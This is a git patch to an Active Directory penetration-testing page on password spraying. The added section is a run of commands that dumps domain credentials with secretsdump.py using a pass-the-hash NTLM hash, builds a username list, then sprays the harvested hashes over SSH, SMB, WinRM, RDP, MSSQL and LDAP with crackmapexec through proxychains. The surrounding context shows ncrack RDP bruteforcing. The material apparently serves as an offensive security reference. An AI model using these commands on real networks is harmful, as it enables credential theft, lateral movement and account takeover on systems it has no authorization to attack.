From 2143a1a52e71ae4bf21372b62709107e43c9f051 Mon Sep 17 00:00:00 2001
From: NoPurposeInLife <30126475+NoPurposeInLife@users.noreply.github.com>
Date: Thu, 25 Jul 2024 21:49:15 +0800
Subject: [PATCH] Update pwd-spraying.md

---
 docs/active-directory/pwd-spraying.md | 26 +++++++++++++++++++++++++-
 1 file changed, 25 insertions(+), 1 deletion(-)

diff --git a/docs/active-directory/pwd-spraying.md b/docs/active-directory/pwd-spraying.md
index 3c9b487..e03eea6 100644
--- a/docs/active-directory/pwd-spraying.md
+++ b/docs/active-directory/pwd-spraying.md
@@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
   ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
   ```
 
+## Spray passwords against everything
+* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
+```
+> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
+proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
+
+echo "" >> users.txt
+echo "Administrator" >> users.txt
+echo "Guest" >> users.txt
+echo "DefaultAccount" >> users.txt
+echo "WDAGUtilityAccount" >> users.txt
+proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+```
 
 ## BadPwdCount attribute
 
@@ -77,4 +101,4 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
 LDAP        10.0.2.11       389    dc01       Guest      badpwdcount: 0 pwdLastSet: <never>
 LDAP        10.0.2.11       389    dc01       krbtgt     badpwdcount: 0 pwdLastSet: <never>
-```
\ No newline at end of file
+```